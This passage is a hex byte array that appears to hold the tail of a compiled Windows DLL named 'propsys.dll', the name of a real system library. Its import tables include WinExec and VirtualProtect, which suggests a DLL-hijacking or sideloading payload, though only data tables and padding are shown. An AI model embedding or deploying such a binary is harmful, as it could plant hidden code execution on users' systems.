,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x01 ,0x07 ,0x04 ,0x00 ,0x07 ,0x32 ,0x03 ,0x30 ,0x02 ,0x60 ,0x01 ,0x70 ,0x01 ,0x04 ,0x01 ,0x00 ,0x04 ,0x42 ,0x00 ,0x00 ,0x01 ,0x04 ,0x01 ,0x00 ,0x04 ,0x42 ,0x00 ,0x00 ,0x01 ,0x04 ,0x01 ,0x00 ,0x04 ,0x42 ,0x00 ,0x00 ,0x01 ,0x04 ,0x01 ,0x00 ,0x04 ,0x42 ,0x00 ,0x00 ,0x01 ,0x04 ,0x01 ,0x00 ,0x04 ,0x42 ,0x00 ,0x00 ,0x01 ,0x04 ,0x01 ,0x00 ,0x04 ,0x42 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x01 ,0x08 ,0x05 ,0x00 ,0x08 ,0x42 ,0x04 ,0x30 ,0x03 ,0x60 ,0x02 ,0x70 ,0x01 ,0x50 ,0x00 ,0x00 ,0x01 ,0x07 ,0x04 ,0x00 ,0x07 ,0x32 ,0x03 ,0x30 ,0x02 ,0x60 ,0x01 ,0x70 ,0x01 ,0x05 ,0x02 ,0x00 ,0x05 ,0x32 ,0x01 ,0x30 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x07 ,0x9f ,0x5e ,0x5d ,0x00 ,0x00 ,0x00 ,0x00 ,0x32 ,0x80 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x28 ,0x80 ,0x00 ,0x00 ,0x2c ,0x80 ,0x00 ,0x00 ,0x30 ,0x80 ,0x00 ,0x00 ,0xb0 ,0x13 ,0x00 ,0x00 ,0x3e ,0x80 ,0x00 ,0x00 ,0x00 ,0x00 ,0x70 ,0x72 ,0x6f ,0x70 ,0x73 ,0x79 ,0x73 ,0x2e ,0x64 ,0x6c ,0x6c ,0x00 ,0x73 ,0x61 ,0x69 ,0x6c ,0x61 ,0x79 ,0x76 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x50 ,0x90 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xbc ,0x95 ,0x00 ,0x00 ,0x98 ,0x91 ,0x00 ,0x00 ,0x10 ,0x91 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x04 ,0x96 ,0x00 ,0x00 ,0x58 ,0x92 ,0x00 ,0x00 ,0x88 ,0x91 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x14 ,0x96 ,0x00 ,0x00 ,0xd0 ,0x92 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xe0 ,0x92 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xf8 ,0x92 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x24 ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x3a ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x50 ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x60 ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x7a ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x8a ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xa6 ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xbe ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xd8 ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xee ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x1c ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x30 ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x4e ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x56 ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x6a ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x78 ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x94 ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xa6 ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xb6 ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xc0 ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xce ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xdc ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xf0 ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xfa ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x95 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x0c ,0x95 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x14 ,0x95 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x1e ,0x95 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x28 ,0x95 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x32 ,0x95 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x3c ,0x95 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x46 ,0x95 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x52 ,0x95 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xe0 ,0x92 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xf8 ,0x92 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x24 ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x3a ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x50 ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x60 ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x7a ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x8a ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xa6 ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xbe ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xd8 ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xee ,0x93 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x1c ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x30 ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x4e ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x56 ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x6a ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x78 ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x94 ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xa6 ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xb6 ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xc0 ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xce ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xdc ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xf0 ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xfa ,0x94 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x95 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x0c ,0x95 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x14 ,0x95 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x1e ,0x95 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x28 ,0x95 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x32 ,0x95 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x3c ,0x95 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x46 ,0x95 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x52 ,0x95 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x0d ,0x01 ,0x44 ,0x65 ,0x6c ,0x65 ,0x74 ,0x65 ,0x43 ,0x72 ,0x69 ,0x74 ,0x69 ,0x63 ,0x61 ,0x6c ,0x53 ,0x65 ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x00 ,0x31 ,0x01 ,0x45 ,0x6e ,0x74 ,0x65 ,0x72 ,0x43 ,0x72 ,0x69 ,0x74 ,0x69 ,0x63 ,0x61 ,0x6c ,0x53 ,0x65 ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x00 ,0x00 ,0x18 ,0x02 ,0x47 ,0x65 ,0x74 ,0x43 ,0x75 ,0x72 ,0x72 ,0x65 ,0x6e ,0x74 ,0x50 ,0x72 ,0x6f ,0x63 ,0x65 ,0x73 ,0x73 ,0x00 ,0x19 ,0x02 ,0x47 ,0x65 ,0x74 ,0x43 ,0x75 ,0x72 ,0x72 ,0x65 ,0x6e ,0x74 ,0x50 ,0x72 ,0x6f ,0x63 ,0x65 ,0x73 ,0x73 ,0x49 ,0x64 ,0x00 ,0x1d ,0x02 ,0x47 ,0x65 ,0x74 ,0x43 ,0x75 ,0x72 ,0x72 ,0x65 ,0x6e ,0x74 ,0x54 ,0x68 ,0x72 ,0x65 ,0x61 ,0x64 ,0x49 ,0x64 ,0x00 ,0x00 ,0x62 ,0x02 ,0x47 ,0x65 ,0x74 ,0x4c ,0x61 ,0x73 ,0x74 ,0x45 ,0x72 ,0x72 ,0x6f ,0x72 ,0x00 ,0x00 ,0xeb ,0x02 ,0x47 ,0x65 ,0x74 ,0x53 ,0x79 ,0x73 ,0x74 ,0x65 ,0x6d ,0x54 ,0x69 ,0x6d ,0x65 ,0x41 ,0x73 ,0x46 ,0x69 ,0x6c ,0x65 ,0x54 ,0x69 ,0x6d ,0x65 ,0x00 ,0x07 ,0x03 ,0x47 ,0x65 ,0x74 ,0x54 ,0x69 ,0x63 ,0x6b ,0x43 ,0x6f ,0x75 ,0x6e ,0x74 ,0x00 ,0x00 ,0x60 ,0x03 ,0x49 ,0x6e ,0x69 ,0x74 ,0x69 ,0x61 ,0x6c ,0x69 ,0x7a ,0x65 ,0x43 ,0x72 ,0x69 ,0x74 ,0x69 ,0x63 ,0x61 ,0x6c ,0x53 ,0x65 ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x00 ,0xb8 ,0x03 ,0x4c ,0x65 ,0x61 ,0x76 ,0x65 ,0x43 ,0x72 ,0x69 ,0x74 ,0x69 ,0x63 ,0x61 ,0x6c ,0x53 ,0x65 ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x00 ,0x00 ,0x46 ,0x04 ,0x51 ,0x75 ,0x65 ,0x72 ,0x79 ,0x50 ,0x65 ,0x72 ,0x66 ,0x6f ,0x72 ,0x6d ,0x61 ,0x6e ,0x63 ,0x65 ,0x43 ,0x6f ,0x75 ,0x6e ,0x74 ,0x65 ,0x72 ,0x00 ,0x9c ,0x04 ,0x52 ,0x74 ,0x6c ,0x41 ,0x64 ,0x64 ,0x46 ,0x75 ,0x6e ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x54 ,0x61 ,0x62 ,0x6c ,0x65 ,0x00 ,0x9d ,0x04 ,0x52 ,0x74 ,0x6c ,0x43 ,0x61 ,0x70 ,0x74 ,0x75 ,0x72 ,0x65 ,0x43 ,0x6f ,0x6e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0xa4 ,0x04 ,0x52 ,0x74 ,0x6c ,0x4c ,0x6f ,0x6f ,0x6b ,0x75 ,0x70 ,0x46 ,0x75 ,0x6e ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x45 ,0x6e ,0x74 ,0x72 ,0x79 ,0x00 ,0x00 ,0xab ,0x04 ,0x52 ,0x74 ,0x6c ,0x56 ,0x69 ,0x72 ,0x74 ,0x75 ,0x61 ,0x6c ,0x55 ,0x6e ,0x77 ,0x69 ,0x6e ,0x64 ,0x00 ,0x00 ,0x43 ,0x05 ,0x53 ,0x65 ,0x74 ,0x55 ,0x6e ,0x68 ,0x61 ,0x6e ,0x64 ,0x6c ,0x65 ,0x64 ,0x45 ,0x78 ,0x63 ,0x65 ,0x70 ,0x74 ,0x69 ,0x6f ,0x6e ,0x46 ,0x69 ,0x6c ,0x74 ,0x65 ,0x72 ,0x00 ,0x51 ,0x05 ,0x53 ,0x6c ,0x65 ,0x65 ,0x70 ,0x00 ,0x60 ,0x05 ,0x54 ,0x65 ,0x72 ,0x6d ,0x69 ,0x6e ,0x61 ,0x74 ,0x65 ,0x50 ,0x72 ,0x6f ,0x63 ,0x65 ,0x73 ,0x73 ,0x00 ,0x00 ,0x74 ,0x05 ,0x54 ,0x6c ,0x73 ,0x47 ,0x65 ,0x74 ,0x56 ,0x61 ,0x6c ,0x75 ,0x65 ,0x00 ,0x82 ,0x05 ,0x55 ,0x6e ,0x68 ,0x61 ,0x6e ,0x64 ,0x6c ,0x65 ,0x64 ,0x45 ,0x78 ,0x63 ,0x65 ,0x70 ,0x74 ,0x69 ,0x6f ,0x6e ,0x46 ,0x69 ,0x6c ,0x74 ,0x65 ,0x72 ,0x00 ,0x00 ,0xa4 ,0x05 ,0x56 ,0x69 ,0x72 ,0x74 ,0x75 ,0x61 ,0x6c ,0x50 ,0x72 ,0x6f ,0x74 ,0x65 ,0x63 ,0x74 ,0x00 ,0x00 ,0xa6 ,0x05 ,0x56 ,0x69 ,0x72 ,0x74 ,0x75 ,0x61 ,0x6c ,0x51 ,0x75 ,0x65 ,0x72 ,0x79 ,0x00 ,0x00 ,0xd4 ,0x05 ,0x57 ,0x69 ,0x6e ,0x45 ,0x78 ,0x65 ,0x63 ,0x00 ,0x54 ,0x00 ,0x5f ,0x5f ,0x69 ,0x6f ,0x62 ,0x5f ,0x66 ,0x75 ,0x6e ,0x63 ,0x00 ,0x00 ,0x7b ,0x00 ,0x5f ,0x61 ,0x6d ,0x73 ,0x67 ,0x5f ,0x65 ,0x78 ,0x69 ,0x74 ,0x00 ,0x00 ,0x4b ,0x01 ,0x5f ,0x69 ,0x6e ,0x69 ,0x74 ,0x74 ,0x65 ,0x72 ,0x6d ,0x00 ,0xb8 ,0x01 ,0x5f ,0x6c ,0x6f ,0x63 ,0x6b ,0x00 ,0x2d ,0x03 ,0x5f ,0x75 ,0x6e ,0x6c ,0x6f ,0x63 ,0x6b ,0x00 ,0x07 ,0x04 ,0x61 ,0x62 ,0x6f ,0x72 ,0x74 ,0x00 ,0x1a ,0x04 ,0x63 ,0x61 ,0x6c ,0x6c ,0x6f ,0x63 ,0x00 ,0x00 ,0x41 ,0x04 ,0x66 ,0x72 ,0x65 ,0x65 ,0x00 ,0x00 ,0x4d ,0x04 ,0x66 ,0x77 ,0x72 ,0x69 ,0x74 ,0x65 ,0x00 ,0x00 ,0x98 ,0x04 ,0x72 ,0x65 ,0x61 ,0x6c ,0x6c ,0x6f ,0x63 ,0x00 ,0xa2 ,0x04 ,0x73 ,0x69 ,0x67 ,0x6e ,0x61 ,0x6c ,0x00 ,0x00 ,0xb7 ,0x04 ,0x73 ,0x74 ,0x72 ,0x6c ,0x65 ,0x6e ,0x00 ,0x00 ,0xba ,0x04 ,0x73 ,0x74 ,0x72 ,0x6e ,0x63 ,0x6d ,0x70 ,0x00 ,0xda ,0x04 ,0x76 ,0x66 ,0x70 ,0x72 ,0x69 ,0x6e ,0x74 ,0x66 ,0x00 ,0x00 ,0x65 ,0x02 ,0x4d ,0x65 ,0x73 ,0x73 ,0x61 ,0x67 ,0x65 ,0x42 ,0x6f ,0x78 ,0x41 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x4b ,0x45 ,0x52 ,0x4e ,0x45 ,0x4c ,0x33 ,0x32 ,0x2e ,0x64 ,0x6c ,0x6c ,0x00 ,0x00 ,0x00 ,0x00 ,0x14 ,0x90 ,0x00 ,0x00 ,0x14 ,0x90 ,0x00 ,0x00 ,0x14 ,0x90 ,0x00 ,0x00 ,0x14 ,0x90 ,0x00 ,0x00 ,0x14 ,0x90 ,0x00 ,0x00 ,0x14 ,0x90 ,0x00 ,0x00 ,0x14 ,0x90 ,0x00 ,0x00 ,0x14 ,0x90 ,0x00 ,0x00 ,0x14 ,0x90 ,0x00 ,0x00 ,0x14 ,0x90 ,0x00 ,0x00 ,0x14 ,0x90 ,0x00 ,0x00 ,0x14 ,0x90 ,0x00 ,0x00 ,0x14 ,0x90 ,0x00 ,0x00 ,0x14 ,0x90 ,0x00 ,0x00 ,0x6d ,0x73 ,0x76 ,0x63 ,0x72 ,0x74 ,0x2e ,0x64 ,0x6c ,0x6c ,0x00 ,0x00 ,0x28 ,0x90 ,0x00 ,0x00 ,0x55 ,0x53 ,0x45 ,0x52 ,0x33 ,0x32 ,0x2e ,0x64 ,0x6c ,0x6c ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 